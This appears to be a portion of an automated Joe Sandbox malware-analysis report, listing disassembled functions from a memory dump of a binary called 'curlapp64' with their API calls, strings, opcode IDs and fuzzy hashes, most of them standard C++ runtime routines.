                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: integral cannot be stored in char$ZYo
                                                                                                                                                                                                  • API String ID: 4097890229-1866195891
                                                                                                                                                                                                  • Opcode ID: b84e775726f4b3f185421aad267f8b541d740d499282f5fc334c3963074b3516
                                                                                                                                                                                                  • Instruction ID: d0c57e096c0bf0dda2479a4b69248949d66f2bbc4d376c52de525b5e82fa76be
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b84e775726f4b3f185421aad267f8b541d740d499282f5fc334c3963074b3516
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2FE1C122E18B8189EF608F64D8403BD67E1FB85785F554235EACD93A9EDF38D681C710
                                                                                                                                                                                                  Function 00007FF6CF9957B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 334COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: integral cannot be stored in char$ZYo
                                                                                                                                                                                                  • API String ID: 4097890229-1866195891
                                                                                                                                                                                                  • Opcode ID: 92fecec11b3016f46a25da3696202e1a6b4244d74e6a6b833baf1a1c5e042e48
                                                                                                                                                                                                  • Instruction ID: 581cff45b881cea29409d31f03ab0086f9cdfd25ce5ecc01fccf920b85fbad56
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92fecec11b3016f46a25da3696202e1a6b4244d74e6a6b833baf1a1c5e042e48
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76E1DD22E18B8189FF508F68D4402AD77E0FB44799F954236EADD93A9EDF38D681C710
                                                                                                                                                                                                  Function 00007FF6CF994C10 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 333COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: integral cannot be stored in char$ZYo
                                                                                                                                                                                                  • API String ID: 4097890229-1866195891
                                                                                                                                                                                                  • Opcode ID: 642abfa4e70b61a345fa1ead2a5f12cd152ead6c6ab379cb8276fb84dc2855b7
                                                                                                                                                                                                  • Instruction ID: cef5a7776c2c73bd95e09a3ef7c46833a4d4d477038caeaba1a1b087565525c1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 642abfa4e70b61a345fa1ead2a5f12cd152ead6c6ab379cb8276fb84dc2855b7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09E1DF22A18B8189EF11CF68D4402BC77A0FB45749F518232EA8D83A9EDF38E685C710
                                                                                                                                                                                                  Function 00007FF6CF99FB90 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 333COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: integral cannot be stored in wchar_t$ZYo
                                                                                                                                                                                                  • API String ID: 4097890229-4117134163
                                                                                                                                                                                                  • Opcode ID: d88f58d57a1f148fc8d371a96d0914883b912c7364169ddcf05bc59badd46fb6
                                                                                                                                                                                                  • Instruction ID: 703a24733ac3e8a3b6169ec796d51f0d37e937a39c9db72d6e5fb0eebc17b11d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d88f58d57a1f148fc8d371a96d0914883b912c7364169ddcf05bc59badd46fb6
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9FE1C122A1878189EF50CF68E4403BCA7A1FB85799F558131EADE83A9EDF3CD585C710
                                                                                                                                                                                                  Function 00007FF6CF99F6F0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 327COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: integral cannot be stored in wchar_t$ZYo
                                                                                                                                                                                                  • API String ID: 4097890229-4117134163
                                                                                                                                                                                                  • Opcode ID: d0af5a609d9997239f8d9a87b93039108021b191f8e280f21d838fa9f4a6a997
                                                                                                                                                                                                  • Instruction ID: 5a27f83055ab41e4ad0cab0a64a7ed1d1c8b53eb5a2e78d16ff2a22e8f1421ef
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0af5a609d9997239f8d9a87b93039108021b191f8e280f21d838fa9f4a6a997
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5AE1D022A18B8189EF50CF69D4402BCB7A0FB45759F554236EACE87A9EDF3CD681C710
                                                                                                                                                                                                  Function 00007FF6CF993D70 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 314COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: integral cannot be stored in char$ZYo
                                                                                                                                                                                                  • API String ID: 909987262-1866195891
                                                                                                                                                                                                  • Opcode ID: b826f5fc70d941490de0c33a654269020e6bfd13175bd841d71075ad1b901a1d
                                                                                                                                                                                                  • Instruction ID: 672b0f3f191c09313c05650ac0fe06aaf8fe892032e81c73cecfd94cdfe771ef
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b826f5fc70d941490de0c33a654269020e6bfd13175bd841d71075ad1b901a1d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4D10322E1878189FF21CFA8E4406BC67A4FB54789F654232DADD83A9EDF38D580C710
                                                                                                                                                                                                  Function 00007FF6CF9B6568 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 304fileCOMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                  • String ID: ZYo
                                                                                                                                                                                                  • API String ID: 2718003287-278324492
                                                                                                                                                                                                  • Opcode ID: 3d4c0514e02d79f87365731d1de066cb527f8a32871e4b00af959242977b0b12
                                                                                                                                                                                                  • Instruction ID: c3f2ad2466da562f1f276d052b118b60bb2dacb57fa3306c2b84a5eb2473b331
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d4c0514e02d79f87365731d1de066cb527f8a32871e4b00af959242977b0b12
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FCD1C032B18A8589EB21CFA5D4402EC37B1F744B99B404576CE9E97B9EDE38E506C710
                                                                                                                                                                                                  Function 00007FF6CF9B5E70 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00007FF6CF9B5E7F
                                                                                                                                                                                                  • SetLastError.KERNEL32 ref: 00007FF6CF9B5E9E
                                                                                                                                                                                                  • FlsSetValue.KERNEL32 ref: 00007FF6CF9B5EC7
                                                                                                                                                                                                  • FlsSetValue.KERNEL32 ref: 00007FF6CF9B5ED8
                                                                                                                                                                                                  • FlsSetValue.KERNEL32 ref: 00007FF6CF9B5EE9
                                                                                                                                                                                                    • Part of subcall function 00007FF6CF9B74F0: HeapFree.KERNEL32(?,?,00007FF6CF9B5363,00007FF6CF9BF382,?,?,?,00007FF6CF9BF6FF,?,?,00000000,00007FF6CF9BFC79,?,?,?,00007FF6CF9BFBAB), ref: 00007FF6CF9B7506
                                                                                                                                                                                                    • Part of subcall function 00007FF6CF9B74F0: GetLastError.KERNEL32(?,?,00007FF6CF9B5363,00007FF6CF9BF382,?,?,?,00007FF6CF9BF6FF,?,?,00000000,00007FF6CF9BFC79,?,?,?,00007FF6CF9BFBAB), ref: 00007FF6CF9B7510
                                                                                                                                                                                                  • SetLastError.KERNEL32 ref: 00007FF6CF9B5F0C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$Value$FreeHeap
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 365477584-0
                                                                                                                                                                                                  • Opcode ID: b9c899493dd6f9e1b3cd70cccc378b2c33b4d53d64c6751ca88f2c12dc2448d5
                                                                                                                                                                                                  • Instruction ID: 77f4484b42ad240a17f6915114aa2384e831bb6bf7d067bced387ece63b5a37c
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b9c899493dd6f9e1b3cd70cccc378b2c33b4d53d64c6751ca88f2c12dc2448d5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D113D21E0C24242FE696F31685507D57526F88BA2F545E34E8AFDBADFCE2CE8418721
                                                                                                                                                                                                  Function 00007FF6CF9A75F4 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 190COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                  • String ID: MOC$RCC$ZYo
                                                                                                                                                                                                  • API String ID: 3544855599-3235221334
                                                                                                                                                                                                  • Opcode ID: abb4ac20c0e7ee47166f1e2e729498332cb1ecb2cd888fb539b0de1d6272756d
                                                                                                                                                                                                  • Instruction ID: 4d8271e9c86fed3e2e3157806dd1def08b35176e973fe4dc28bb46f29fd2acb4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: abb4ac20c0e7ee47166f1e2e729498332cb1ecb2cd888fb539b0de1d6272756d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B919073E08B818AEB50DF64D8852AD7BE0FB44789F10412AEE8D9775ADF38D195CB10
                                                                                                                                                                                                  Function 00007FF6CF99A440 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 182COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                                                                                                                                                                                  • String ID: \printui.exe$ZYo
                                                                                                                                                                                                  • API String ID: 3936042273-3769033780
                                                                                                                                                                                                  • Opcode ID: 90394b4a721abfce4623a459822bfdda1cc18a6cf456af26122fff8c654697fa
                                                                                                                                                                                                  • Instruction ID: 6dbb08fc01c84b6ec8a8df93d55fd2b1c2c9cf8a3e72a8ad963e1c6f787c8124
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 90394b4a721abfce4623a459822bfdda1cc18a6cf456af26122fff8c654697fa
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1461D622F0978549EE14AF65A44037DB7A0EB45BE1F154231DAED87BDECE3CE5818720
                                                                                                                                                                                                  Function 00007FF6CF973D80 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: __std_exception_destroy$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                  • String ID: [json.exception.$ZYo
                                                                                                                                                                                                  • API String ID: 2506729964-1016827443
                                                                                                                                                                                                  • Opcode ID: a15fe9e3dd0ab3612aafe936adf61db6a24d702351fdf8ab5c195f6f28f71eef
                                                                                                                                                                                                  • Instruction ID: 2a03e3759a776445d588e113a82d91b695cb6662548580ed7e6f47b1199ab97e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a15fe9e3dd0ab3612aafe936adf61db6a24d702351fdf8ab5c195f6f28f71eef
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5751F022B18B8282EF109F2AE01076D67A1EB85BD1F544132EA9D47B9FCF3DE091C750
                                                                                                                                                                                                  Function 00007FF6CF971A20 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                                                  • String ID: bad locale name
                                                                                                                                                                                                  • API String ID: 2967684691-1405518554
                                                                                                                                                                                                  • Opcode ID: 36c21e983f29bd10273b36af1d2549a688b365a80dab9db7502aa811d3725e5c
                                                                                                                                                                                                  • Instruction ID: 741fb9543717e9660fa81ffe229e33c39a191870d612c2bb2dbef92491411ca9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 36c21e983f29bd10273b36af1d2549a688b365a80dab9db7502aa811d3725e5c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3416622B0AB418AFF64DFA0D4502BC33B4AF40748F044436DE8DA6A9EDF38D556D364
                                                                                                                                                                                                  Function 00007FF6CF998D30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Module$FileHandleName
                                                                                                                                                                                                  • String ID: ZYo
                                                                                                                                                                                                  • API String ID: 4146042529-278324492
                                                                                                                                                                                                  • Opcode ID: 80d56585cf3bb0cae7f4b05554e27583c43836ff64ba581ffbaeac8f1f8b774f
                                                                                                                                                                                                  • Instruction ID: cfdac8f0c76b4d789519e8ba1766c71b4cf04194df1f85ce26a2d1c631d26358
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80d56585cf3bb0cae7f4b05554e27583c43836ff64ba581ffbaeac8f1f8b774f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D41E331E18B8286EF10DF21E4403AD6361FB943A5F911236DADC93A9ADF78E295C750
                                                                                                                                                                                                  Function 00007FF6CF99749B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                  • String ID: Negative width.$Number is too big.
                                                                                                                                                                                                  • API String ID: 909987262-1861685508
                                                                                                                                                                                                  • Opcode ID: 320735af1e8252cf155c051fe62f8adae52c5b50b9df1efdcb582bcfec092ecf
                                                                                                                                                                                                  • Instruction ID: 5a1e465efb652b41c8427da1df16f390166195d1374fd591d7e5dfeaa2ada1df
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 320735af1e8252cf155c051fe62f8adae52c5b50b9df1efdcb582bcfec092ecf
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC113D42C0C1874FFDC97F7824090B92B505F92712F6A4835D3ECC25DBAC0E2A0285B3
                                                                                                                                                                                                  Function 00007FF6CF997570 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165517971.00007FF6CF971000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6CF970000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165505076.00007FF6CF970000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165550750.00007FF6CF9C9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165576654.00007FF6CFA01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165591280.00007FF6CFA05000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff6cf970000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                  • String ID: Negative precision.$Number is too big.
                                                                                                                                                                                                  • API String ID: 3237623162-3993994484
                                                                                                                                                                                                  • Opcode ID: 967a7eb5fad877dfc14cd9993c307950e699535fff711e18bd837ab3ad44be39
                                                                                                                                                                                                  • Instruction ID: 0fb813599429d91c918e187565c67afac0ec8d4b3fee2530a9c69a83ca612fe8
